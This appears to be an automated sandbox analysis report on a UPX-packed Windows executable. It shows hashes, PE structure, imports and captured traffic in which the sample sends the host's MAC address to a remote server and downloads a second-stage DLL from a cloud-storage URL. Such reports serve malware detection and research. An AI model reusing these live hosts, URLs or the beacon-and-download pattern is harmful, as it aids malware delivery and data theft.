                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......t..`0..30..30..3=.F3...3=.x3$..3.ml33..30..3}..3=.G3...3..B3=..3..{31..3=.|31..3..y31..3Rich0..3........PE..L....Z.V...........!.....f...*............................................................@..........................:..f...H;..(.......................8...........................................07..@............................................text...td.......f.................. ..`.rdata...............j..............@..@.data...L....P..."...,..............@....rsrc................N..............@..@.reloc...............P..............@..B................................................................................................................................................................................................................................................................................................................................

                                                              Static File Info

                                                              General

                                                              File type:PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
                                                              Entropy (8bit):7.997180952275106
                                                              TrID:
                                                              • Win32 Executable (generic) a (10002005/4) 99.39%
                                                              • UPX compressed Win32 Executable (30571/9) 0.30%
                                                              • Win32 EXE Yoda's Crypter (26571/9) 0.26%
                                                              • Generic Win/DOS Executable (2004/3) 0.02%
                                                              • DOS Executable Generic (2002/1) 0.02%
                                                              File name:1734098836319.exe
                                                              File size:547'840 bytes
                                                              MD5:b2524709c9b62c107eaa1235db37cbdb
                                                              SHA1:798cbea0bbe9b23462be4c5e8a3743399cd529d5
                                                              SHA256:e40b03e684f2db354aabacfc64cdaaaff31d27e844febf87c9af66cd39d74989
                                                              SHA512:69b90a78ada1df03d6716077e98d88eca45809f4f70bbff4169ea908e7765ccf88cf928345fddc379af8819f575c938f2b676468617d5055ac7eca73e30101f8
                                                              SSDEEP:12288:CvGfiU7cXS/yAtQrHw31QW52JStw8wkvVsx4/ptI/pKYP6EKoQXXoS:Cv8isyAtQTk1n2Mt9iqSRPPKoQX
                                                              TLSH:5EC4230FF7A98312DC885EB60D8F3ACD2514D03391DEFFA53CA99DED588960EC554A82
                                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......:PE.~1+,~1+,~1+,.. ,.1+,.-',.1+,.-%,a1+,H.!,.1+,.>t,z1+,..!,|1+,~1*,.1+,.>v,e1+,H. ,,1+,~1+,.1+,.. ,z1+,Rich~1+,...............

                                                              File Icon

                                                              Icon Hash:90cececece8e8eb0

                                                              Static PE Info

                                                              General

                                                              Entrypoint:0x6be4f0
                                                              Entrypoint Section:UPX1
                                                              Digitally signed:false
                                                              Imagebase:0x400000
                                                              Subsystem:windows gui
                                                              Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                              DLL Characteristics:
                                                              Time Stamp:0x675C30AC [Fri Dec 13 13:03:40 2024 UTC]
                                                              TLS Callbacks:
                                                              CLR (.Net) Version:
                                                              OS Version Major:4
                                                              OS Version Minor:0
                                                              File Version Major:4
                                                              File Version Minor:0
                                                              Subsystem Version Major:4
                                                              Subsystem Version Minor:0
                                                              Import Hash:28d14723f510a4f77e0b80373dcbac2d

                                                              Entrypoint Preview

                                                              Instruction
                                                              pushad
                                                              mov esi, 0063A000h
                                                              lea edi, dword ptr [esi-00239000h]
                                                              push edi
                                                              mov ebp, esp
                                                              lea ebx, dword ptr [esp-00003E80h]
                                                              xor eax, eax
                                                              push eax
                                                              cmp esp, ebx
                                                              jne 00007FC5D891FD0Dh
                                                              inc esi
                                                              inc esi
                                                              push ebx
                                                              push 002BC85Bh
                                                              push edi
                                                              add ebx, 04h
                                                              push ebx
                                                              push 000844EBh
                                                              push esi
                                                              add ebx, 04h
                                                              push ebx
                                                              push eax
                                                              mov dword ptr [ebx], 00020003h
                                                              nop
                                                              nop
                                                              nop
                                                              nop
                                                              nop
                                                              push ebp
                                                              push edi
                                                              push esi
                                                              push ebx
                                                              sub esp, 7Ch
                                                              mov edx, dword ptr [esp+00000090h]
                                                              mov dword ptr [esp+74h], 00000000h
                                                              mov byte ptr [esp+73h], 00000000h
                                                              mov ebp, dword ptr [esp+0000009Ch]
                                                              lea eax, dword ptr [edx+04h]
                                                              mov dword ptr [esp+78h], eax
                                                              mov eax, 00000001h
                                                              movzx ecx, byte ptr [edx+02h]
                                                              mov ebx, eax
                                                              shl ebx, cl
                                                              mov ecx, ebx
                                                              dec ecx
                                                              mov dword ptr [esp+6Ch], ecx
                                                              movzx ecx, byte ptr [edx+01h]
                                                              shl eax, cl
                                                              dec eax
                                                              mov dword ptr [esp+68h], eax
                                                              mov eax, dword ptr [esp+000000A8h]
                                                              movzx esi, byte ptr [edx]
                                                              mov dword ptr [ebp+00h], 00000000h
                                                              mov dword ptr [esp+60h], 00000000h
                                                              mov dword ptr [eax], 00000000h
                                                              mov eax, 00000300h
                                                              mov dword ptr [esp+64h], esi
                                                              mov dword ptr [esp+5Ch], 00000001h
                                                              mov dword ptr [esp+58h], 00000001h
                                                              mov dword ptr [esp+54h], 00000001h

                                                              Rich Headers

                                                              Programming Language:
                                                              • [ C ] VS98 (6.0) SP6 build 8804
                                                              • [ C ] VS98 (6.0) build 8168
                                                              • [C++] VS98 (6.0) SP6 build 8804
                                                              • [C++] VS98 (6.0) build 8168

                                                              Data Directories

                                                              NameVirtual AddressVirtual Size Is in Section
                                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_IMPORT0x2c02940x35c.rsrc
                                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0x2c00000x294.rsrc
                                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                              Sections

                                                              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                              UPX00x10000x2390000x0d41d8cd98f00b204e9800998ecf8427eunknownunknownunknownunknownIMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                              UPX10x23a0000x860000x8520074bbb1187f5f2ab3b98ffc5d25fb386aFalse0.9975773914319249ARC archive data, packed7.999216562896292IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                              .rsrc0x2c00000x10000x60090e3570e7f941119ce23c09cc8ca603bFalse0.48046875data3.950684677858209IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

                                                              Resources

                                                              NameRVASizeTypeLanguageCountryZLIB Complexity
                                                              RT_VERSION0x2c005c0x238dataChineseChina0.5264084507042254

                                                              Imports

                                                              DLLImport
                                                              KERNEL32.DLLLoadLibraryA, GetProcAddress, VirtualProtect, VirtualAlloc, VirtualFree, ExitProcess
                                                              ADVAPI32.dllRegCloseKey
                                                              CRYPT32.dllCryptUnprotectMemory
                                                              iphlpapi.dllSendARP
                                                              ole32.dllOleRun
                                                              oleaut32.dllVarR8FromBool
                                                              psapi.dllGetModuleInformation
                                                              shell32.dllSHGetSpecialFolderPathA
                                                              shlwapi.dllStrToIntW
                                                              USER32.dllwsprintfA
                                                              version.dllVerQueryValueA
                                                              WINHTTP.dllWinHttpOpen
                                                              WININET.dllInternetOpenA
                                                              ws2_32.dllWSAStartup

                                                              Possible Origin

                                                              Language of compilation systemCountry where language is spokenMap
                                                              ChineseChina

                                                              Network Behavior

                                                              Network Port Distribution

                                                              TCP Packets

                                                              TimestampSource PortDest PortSource IPDest IP
                                                              Jan 2, 2025 09:28:26.123507977 CET497308000192.168.2.443.226.78.44
                                                              Jan 2, 2025 09:28:26.128392935 CET80004973043.226.78.44192.168.2.4
                                                              Jan 2, 2025 09:28:26.128479958 CET497308000192.168.2.443.226.78.44
                                                              Jan 2, 2025 09:28:26.128614902 CET497308000192.168.2.443.226.78.44
                                                              Jan 2, 2025 09:28:26.133394957 CET80004973043.226.78.44192.168.2.4
                                                              Jan 2, 2025 09:28:27.968727112 CET80004973043.226.78.44192.168.2.4
                                                              Jan 2, 2025 09:28:27.968848944 CET497308000192.168.2.443.226.78.44
                                                              Jan 2, 2025 09:28:28.230370998 CET80004973043.226.78.44192.168.2.4
                                                              Jan 2, 2025 09:28:28.230546951 CET497308000192.168.2.443.226.78.44
                                                              Jan 2, 2025 09:28:28.813676119 CET49731443192.168.2.439.103.20.61
                                                              Jan 2, 2025 09:28:28.813736916 CET4434973139.103.20.61192.168.2.4
                                                              Jan 2, 2025 09:28:28.813824892 CET49731443192.168.2.439.103.20.61
                                                              Jan 2, 2025 09:28:28.825356007 CET49731443192.168.2.439.103.20.61
                                                              Jan 2, 2025 09:28:28.825376034 CET4434973139.103.20.61192.168.2.4
                                                              Jan 2, 2025 09:28:30.154412985 CET4434973139.103.20.61192.168.2.4
                                                              Jan 2, 2025 09:28:30.154563904 CET49731443192.168.2.439.103.20.61
                                                              Jan 2, 2025 09:28:30.155662060 CET4434973139.103.20.61192.168.2.4
                                                              Jan 2, 2025 09:28:30.155864954 CET49731443192.168.2.439.103.20.61
                                                              Jan 2, 2025 09:28:30.213951111 CET49731443192.168.2.439.103.20.61
                                                              Jan 2, 2025 09:28:30.213988066 CET4434973139.103.20.61192.168.2.4
                                                              Jan 2, 2025 09:28:30.214370012 CET4434973139.103.20.61192.168.2.4
                                                              Jan 2, 2025 09:28:30.214482069 CET49731443192.168.2.439.103.20.61
                                                              Jan 2, 2025 09:28:30.218420982 CET49731443192.168.2.439.103.20.61
                                                              Jan 2, 2025 09:28:30.263341904 CET4434973139.103.20.61192.168.2.4
                                                              Jan 2, 2025 09:28:30.549942017 CET4434973139.103.20.61192.168.2.4
                                                              Jan 2, 2025 09:28:30.549968958 CET4434973139.103.20.61192.168.2.4
                                                              Jan 2, 2025 09:28:30.550028086 CET4434973139.103.20.61192.168.2.4
                                                              Jan 2, 2025 09:28:30.550070047 CET49731443192.168.2.439.103.20.61
                                                              Jan 2, 2025 09:28:30.550111055 CET4434973139.103.20.61192.168.2.4
                                                              Jan 2, 2025 09:28:30.550132036 CET49731443192.168.2.439.103.20.61
                                                              Jan 2, 2025 09:28:30.550200939 CET49731443192.168.2.439.103.20.61
                                                              Jan 2, 2025 09:28:30.550359011 CET4434973139.103.20.61192.168.2.4
                                                              Jan 2, 2025 09:28:30.550442934 CET49731443192.168.2.439.103.20.61
                                                              Jan 2, 2025 09:28:30.770546913 CET4434973139.103.20.61192.168.2.4
                                                              Jan 2, 2025 09:28:30.770653009 CET49731443192.168.2.439.103.20.61
                                                              Jan 2, 2025 09:28:30.770772934 CET4434973139.103.20.61192.168.2.4
                                                              Jan 2, 2025 09:28:30.770843983 CET49731443192.168.2.439.103.20.61
                                                              Jan 2, 2025 09:28:30.772661924 CET4434973139.103.20.61192.168.2.4
                                                              Jan 2, 2025 09:28:30.772737026 CET49731443192.168.2.439.103.20.61
                                                              Jan 2, 2025 09:28:30.772974968 CET4434973139.103.20.61192.168.2.4
                                                              Jan 2, 2025 09:28:30.773030996 CET49731443192.168.2.439.103.20.61
                                                              Jan 2, 2025 09:28:30.773154020 CET4434973139.103.20.61192.168.2.4
                                                              Jan 2, 2025 09:28:30.773219109 CET4434973139.103.20.61192.168.2.4
                                                              Jan 2, 2025 09:28:30.773238897 CET49731443192.168.2.439.103.20.61
                                                              Jan 2, 2025 09:28:30.773252964 CET4434973139.103.20.61192.168.2.4
                                                              Jan 2, 2025 09:28:30.773277998 CET49731443192.168.2.439.103.20.61
                                                              Jan 2, 2025 09:28:30.773298979 CET49731443192.168.2.439.103.20.61
                                                              Jan 2, 2025 09:28:30.773818970 CET4434973139.103.20.61192.168.2.4
                                                              Jan 2, 2025 09:28:30.773890972 CET49731443192.168.2.439.103.20.61
                                                              Jan 2, 2025 09:28:30.992131948 CET4434973139.103.20.61192.168.2.4
                                                              Jan 2, 2025 09:28:30.992218018 CET49731443192.168.2.439.103.20.61
                                                              Jan 2, 2025 09:28:30.992383003 CET4434973139.103.20.61192.168.2.4
                                                              Jan 2, 2025 09:28:30.992449999 CET49731443192.168.2.439.103.20.61
                                                              Jan 2, 2025 09:28:30.992822886 CET4434973139.103.20.61192.168.2.4
                                                              Jan 2, 2025 09:28:30.992883921 CET49731443192.168.2.439.103.20.61
                                                              Jan 2, 2025 09:28:30.993594885 CET4434973139.103.20.61192.168.2.4
                                                              Jan 2, 2025 09:28:30.993837118 CET49731443192.168.2.439.103.20.61
                                                              Jan 2, 2025 09:28:30.993850946 CET4434973139.103.20.61192.168.2.4
                                                              Jan 2, 2025 09:28:30.993876934 CET4434973139.103.20.61192.168.2.4
                                                              Jan 2, 2025 09:28:30.993904114 CET49731443192.168.2.439.103.20.61
                                                              Jan 2, 2025 09:28:30.993930101 CET49731443192.168.2.439.103.20.61
                                                              Jan 2, 2025 09:28:30.994453907 CET4434973139.103.20.61192.168.2.4
                                                              Jan 2, 2025 09:28:30.994509935 CET49731443192.168.2.439.103.20.61
                                                              Jan 2, 2025 09:28:30.995279074 CET4434973139.103.20.61192.168.2.4
                                                              Jan 2, 2025 09:28:30.995340109 CET49731443192.168.2.439.103.20.61
                                                              Jan 2, 2025 09:28:30.995343924 CET4434973139.103.20.61192.168.2.4
                                                              Jan 2, 2025 09:28:30.995362997 CET4434973139.103.20.61192.168.2.4
                                                              Jan 2, 2025 09:28:30.995393991 CET49731443192.168.2.439.103.20.61
                                                              Jan 2, 2025 09:28:30.995423079 CET49731443192.168.2.439.103.20.61
                                                              Jan 2, 2025 09:28:30.996206045 CET4434973139.103.20.61192.168.2.4
                                                              Jan 2, 2025 09:28:30.996260881 CET49731443192.168.2.439.103.20.61
                                                              Jan 2, 2025 09:28:30.997035980 CET4434973139.103.20.61192.168.2.4
                                                              Jan 2, 2025 09:28:30.997085094 CET49731443192.168.2.439.103.20.61
                                                              Jan 2, 2025 09:28:30.997103930 CET4434973139.103.20.61192.168.2.4
                                                              Jan 2, 2025 09:28:30.997163057 CET49731443192.168.2.439.103.20.61
                                                              Jan 2, 2025 09:28:30.997829914 CET4434973139.103.20.61192.168.2.4
                                                              Jan 2, 2025 09:28:30.997880936 CET49731443192.168.2.439.103.20.61
                                                              Jan 2, 2025 09:28:30.998941898 CET4434973139.103.20.61192.168.2.4
                                                              Jan 2, 2025 09:28:30.998992920 CET49731443192.168.2.439.103.20.61
                                                              Jan 2, 2025 09:28:31.220936060 CET4434973139.103.20.61192.168.2.4
                                                              Jan 2, 2025 09:28:31.221035004 CET4434973139.103.20.61192.168.2.4
                                                              Jan 2, 2025 09:28:31.221075058 CET49731443192.168.2.439.103.20.61
                                                              Jan 2, 2025 09:28:31.221117020 CET4434973139.103.20.61192.168.2.4
                                                              Jan 2, 2025 09:28:31.221132994 CET49731443192.168.2.439.103.20.61
                                                              Jan 2, 2025 09:28:31.221134901 CET4434973139.103.20.61192.168.2.4
                                                              Jan 2, 2025 09:28:31.221162081 CET49731443192.168.2.439.103.20.61
                                                              Jan 2, 2025 09:28:31.221168995 CET4434973139.103.20.61192.168.2.4
                                                              Jan 2, 2025 09:28:31.221179962 CET4434973139.103.20.61192.168.2.4
                                                              Jan 2, 2025 09:28:31.221194983 CET49731443192.168.2.439.103.20.61
                                                              Jan 2, 2025 09:28:31.221226931 CET49731443192.168.2.439.103.20.61
                                                              Jan 2, 2025 09:28:31.221232891 CET4434973139.103.20.61192.168.2.4
                                                              Jan 2, 2025 09:28:31.221278906 CET49731443192.168.2.439.103.20.61
                                                              Jan 2, 2025 09:28:31.221447945 CET4434973139.103.20.61192.168.2.4
                                                              Jan 2, 2025 09:28:31.221492052 CET49731443192.168.2.439.103.20.61
                                                              Jan 2, 2025 09:28:31.221498013 CET4434973139.103.20.61192.168.2.4
                                                              Jan 2, 2025 09:28:31.221546888 CET49731443192.168.2.439.103.20.61
                                                              Jan 2, 2025 09:28:31.221551895 CET4434973139.103.20.61192.168.2.4
                                                              Jan 2, 2025 09:28:31.221596956 CET49731443192.168.2.439.103.20.61
                                                              Jan 2, 2025 09:28:31.221745968 CET4434973139.103.20.61192.168.2.4
                                                              Jan 2, 2025 09:28:31.221807957 CET49731443192.168.2.439.103.20.61
                                                              Jan 2, 2025 09:28:31.222004890 CET4434973139.103.20.61192.168.2.4
                                                              Jan 2, 2025 09:28:31.222062111 CET4434973139.103.20.61192.168.2.4
                                                              Jan 2, 2025 09:28:31.222064972 CET49731443192.168.2.439.103.20.61
                                                              Jan 2, 2025 09:28:31.222079039 CET4434973139.103.20.61192.168.2.4
                                                              Jan 2, 2025 09:28:31.222106934 CET49731443192.168.2.439.103.20.61
                                                              Jan 2, 2025 09:28:31.222138882 CET49731443192.168.2.439.103.20.61
                                                              Jan 2, 2025 09:28:31.222145081 CET4434973139.103.20.61192.168.2.4
                                                              Jan 2, 2025 09:28:31.222206116 CET49731443192.168.2.439.103.20.61
                                                              Jan 2, 2025 09:28:31.222836018 CET4434973139.103.20.61192.168.2.4
                                                              Jan 2, 2025 09:28:31.222898006 CET49731443192.168.2.439.103.20.61
                                                              Jan 2, 2025 09:28:31.222903967 CET4434973139.103.20.61192.168.2.4
                                                              Jan 2, 2025 09:28:31.222914934 CET4434973139.103.20.61192.168.2.4
                                                              Jan 2, 2025 09:28:31.222973108 CET49731443192.168.2.439.103.20.61
                                                              Jan 2, 2025 09:28:31.222992897 CET49731443192.168.2.439.103.20.61
                                                              Jan 2, 2025 09:28:31.223303080 CET4434973139.103.20.61192.168.2.4
                                                              Jan 2, 2025 09:28:31.223347902 CET4434973139.103.20.61192.168.2.4
                                                              Jan 2, 2025 09:28:31.223351955 CET49731443192.168.2.439.103.20.61
                                                              Jan 2, 2025 09:28:31.223367929 CET4434973139.103.20.61192.168.2.4
                                                              Jan 2, 2025 09:28:31.223391056 CET49731443192.168.2.439.103.20.61
                                                              Jan 2, 2025 09:28:31.223427057 CET49731443192.168.2.439.103.20.61
                                                              Jan 2, 2025 09:28:31.223467112 CET4434973139.103.20.61192.168.2.4
                                                              Jan 2, 2025 09:28:31.223516941 CET49731443192.168.2.439.103.20.61
                                                              Jan 2, 2025 09:28:31.223524094 CET4434973139.103.20.61192.168.2.4
                                                              Jan 2, 2025 09:28:31.223556042 CET4434973139.103.20.61192.168.2.4
                                                              Jan 2, 2025 09:28:31.223625898 CET49731443192.168.2.439.103.20.61
                                                              Jan 2, 2025 09:28:31.223625898 CET49731443192.168.2.439.103.20.61
                                                              Jan 2, 2025 09:28:31.223634958 CET4434973139.103.20.61192.168.2.4
                                                              Jan 2, 2025 09:28:31.223674059 CET49731443192.168.2.439.103.20.61
                                                              Jan 2, 2025 09:28:31.224343061 CET4434973139.103.20.61192.168.2.4
                                                              Jan 2, 2025 09:28:31.224397898 CET49731443192.168.2.439.103.20.61
                                                              Jan 2, 2025 09:28:31.224406958 CET4434973139.103.20.61192.168.2.4
                                                              Jan 2, 2025 09:28:31.224419117 CET4434973139.103.20.61192.168.2.4
                                                              Jan 2, 2025 09:28:31.224461079 CET49731443192.168.2.439.103.20.61
                                                              Jan 2, 2025 09:28:31.225709915 CET4434973139.103.20.61192.168.2.4
                                                              Jan 2, 2025 09:28:31.225764990 CET49731443192.168.2.439.103.20.61
                                                              Jan 2, 2025 09:28:31.225824118 CET4434973139.103.20.61192.168.2.4
                                                              Jan 2, 2025 09:28:31.225878000 CET49731443192.168.2.439.103.20.61
                                                              Jan 2, 2025 09:28:31.225892067 CET4434973139.103.20.61192.168.2.4
                                                              Jan 2, 2025 09:28:31.225940943 CET49731443192.168.2.439.103.20.61
                                                              Jan 2, 2025 09:28:31.307699919 CET4434973139.103.20.61192.168.2.4
                                                              Jan 2, 2025 09:28:31.307771921 CET49731443192.168.2.439.103.20.61
                                                              Jan 2, 2025 09:28:31.307804108 CET4434973139.103.20.61192.168.2.4
                                                              Jan 2, 2025 09:28:31.307864904 CET49731443192.168.2.439.103.20.61
                                                              Jan 2, 2025 09:28:31.651912928 CET4434973139.103.20.61192.168.2.4
                                                              Jan 2, 2025 09:28:31.651964903 CET4434973139.103.20.61192.168.2.4
                                                              Jan 2, 2025 09:28:31.652007103 CET4434973139.103.20.61192.168.2.4
                                                              Jan 2, 2025 09:28:31.652086020 CET49731443192.168.2.439.103.20.61
                                                              Jan 2, 2025 09:28:31.652116060 CET4434973139.103.20.61192.168.2.4
                                                              Jan 2, 2025 09:28:31.652148008 CET49731443192.168.2.439.103.20.61
                                                              Jan 2, 2025 09:28:31.652172089 CET4434973139.103.20.61192.168.2.4
                                                              Jan 2, 2025 09:28:31.652192116 CET49731443192.168.2.439.103.20.61
                                                              Jan 2, 2025 09:28:31.652234077 CET49731443192.168.2.439.103.20.61
                                                              Jan 2, 2025 09:28:31.652240992 CET4434973139.103.20.61192.168.2.4
                                                              Jan 2, 2025 09:28:31.652266979 CET4434973139.103.20.61192.168.2.4
                                                              Jan 2, 2025 09:28:31.652282953 CET49731443192.168.2.439.103.20.61
                                                              Jan 2, 2025 09:28:31.652313948 CET49731443192.168.2.439.103.20.61
                                                              Jan 2, 2025 09:28:31.656461000 CET49731443192.168.2.439.103.20.61
                                                              Jan 2, 2025 09:28:31.656488895 CET4434973139.103.20.61192.168.2.4
                                                              Jan 2, 2025 09:28:45.546401978 CET6307253192.168.2.41.1.1.1
                                                              Jan 2, 2025 09:28:45.551286936 CET53630721.1.1.1192.168.2.4
                                                              Jan 2, 2025 09:28:45.551392078 CET6307253192.168.2.41.1.1.1
                                                              Jan 2, 2025 09:28:45.556233883 CET53630721.1.1.1192.168.2.4
                                                              Jan 2, 2025 09:28:46.015247107 CET6307253192.168.2.41.1.1.1
                                                              Jan 2, 2025 09:28:46.020267010 CET53630721.1.1.1192.168.2.4
                                                              Jan 2, 2025 09:28:46.021363974 CET6307253192.168.2.41.1.1.1
                                                              Jan 2, 2025 09:30:16.096401930 CET497308000192.168.2.443.226.78.44
                                                              Jan 2, 2025 09:30:16.101685047 CET80004973043.226.78.44192.168.2.4
                                                              Jan 2, 2025 09:30:16.101767063 CET497308000192.168.2.443.226.78.44

                                                              UDP Packets

                                                              TimestampSource PortDest PortSource IPDest IP
                                                              Jan 2, 2025 09:28:28.241522074 CET5667053192.168.2.41.1.1.1
                                                              Jan 2, 2025 09:28:28.810309887 CET53566701.1.1.1192.168.2.4
                                                              Jan 2, 2025 09:28:45.540153027 CET53618301.1.1.1192.168.2.4

                                                              DNS Queries

                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                              Jan 2, 2025 09:28:28.241522074 CET192.168.2.41.1.1.10x52a1Standard query (0)cesg1.oss-cn-beijing.aliyuncs.comA (IP address)IN (0x0001)false

                                                              DNS Answers

                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                              Jan 2, 2025 09:28:28.810309887 CET1.1.1.1192.168.2.40x52a1No error (0)cesg1.oss-cn-beijing.aliyuncs.comsc-2dwy.cn-beijing.oss-adns.aliyuncs.comCNAME (Canonical name)IN (0x0001)false
                                                              Jan 2, 2025 09:28:28.810309887 CET1.1.1.1192.168.2.40x52a1No error (0)sc-2dwy.cn-beijing.oss-adns.aliyuncs.comsc-2dwy.cn-beijing.oss-adns.aliyuncs.com.gds.alibabadns.comCNAME (Canonical name)IN (0x0001)false
                                                              Jan 2, 2025 09:28:28.810309887 CET1.1.1.1192.168.2.40x52a1No error (0)sc-2dwy.cn-beijing.oss-adns.aliyuncs.com.gds.alibabadns.com39.103.20.61A (IP address)IN (0x0001)false

                                                              HTTP Request Dependency Graph

                                                              • https:
                                                                • cesg1.oss-cn-beijing.aliyuncs.com
                                                              • 43.226.78.44:8000

                                                              HTTP Packets

                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              0192.168.2.44973043.226.78.4480007472C:\Users\user\Desktop\1734098836319.exe
                                                              TimestampBytes transferredDirectionData
                                                              Jan 2, 2025 09:28:26.128614902 CET352OUTPOST /macweb/submit/ HTTP/1.1
                                                              Accept: */*
                                                              Referer: http://43.226.78.44:8000/macweb/submit/
                                                              Accept-Language: zh-cn
                                                              Content-Type: application/x-www-form-urlencoded
                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)
                                                              Host: 43.226.78.44:8000
                                                              Content-Length: 49
                                                              Cache-Control: no-cache
                                                              Data Raw: 63 68 61 6e 6e 65 6c 5f 6e 75 6d 62 65 72 3d 38 30 30 33 26 6d 61 63 5f 61 64 64 72 65 73 73 3d 45 43 3a 46 34 3a 42 42 3a 45 41 3a 31 35 3a 38 38
                                                              Data Ascii: channel_number=8003&mac_address=EC:F4:BB:EA:15:88
                                                              Jan 2, 2025 09:28:27.968727112 CET17INHTTP/1.1 200 OK


                                                              HTTPS Proxied Packets

                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              0192.168.2.44973139.103.20.614437472C:\Users\user\Desktop\1734098836319.exe
                                                              TimestampBytes transferredDirectionData
                                                              2025-01-02 08:28:30 UTC254OUTGET /8001.dll HTTP/1.1
                                                              Accept: */*
                                                              Referer: https://cesg1.oss-cn-beijing.aliyuncs.com/8001.dll
                                                              Accept-Language: zh-cn
                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)
                                                              Host: cesg1.oss-cn-beijing.aliyuncs.com
                                                              Cache-Control: no-cache
                                                              2025-01-02 08:28:30 UTC559INHTTP/1.1 200 OK
                                                              Server: AliyunOSS
                                                              Date: Thu, 02 Jan 2025 08:28:30 GMT
                                                              Content-Type: application/octet-stream
                                                              Content-Length: 229376
                                                              Connection: close
                                                              x-oss-request-id: 67764E2E998B3E33315B15D7
                                                              Accept-Ranges: bytes
                                                              ETag: "0269CBD8F0D55E1B87BE84F31EE9F4C0"
                                                              Last-Modified: Thu, 26 Dec 2024 17:41:23 GMT
                                                              x-oss-object-type: Normal
                                                              x-oss-hash-crc64ecma: 271439009371289363
                                                              x-oss-storage-class: Standard
                                                              x-oss-ec: 0048-00000113
                                                              Content-Disposition: attachment
                                                              x-oss-force-download: true
                                                              Content-MD5: AmnL2PDVXhuHvoTzHun0wA==
                                                              x-oss-server-time: 1
                                                              2025-01-02 08:28:30 UTC3537INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 5d ac 9e 7d 19 cd f0 2e 19 cd f0 2e 19 cd f0 2e 62 d1 fc 2e 18 cd f0 2e da c2 af 2e 1d cd f0 2e 9a d1 fe 2e 02 cd f0 2e 2f eb fa 2e 7b cd f0 2e da c2 ad 2e 16 cd f0 2e 19 cd f1 2e 80 cd f0 2e 2f eb fb 2e 5b cd f0 2e 19 cd f0 2e 11 cd f0 2e f1 d2 fb 2e 1a cd f0 2e f1 d2 f4 2e 18 cd f0 2e 52 69 63 68 19 cd f0 2e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05
                                                              Data Ascii: MZ@!L!This program cannot be run in DOS mode.$]}...b....../.{...../.[.......Rich.PEL
                                                              2025-01-02 08:28:30 UTC4096INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                              Data Ascii:
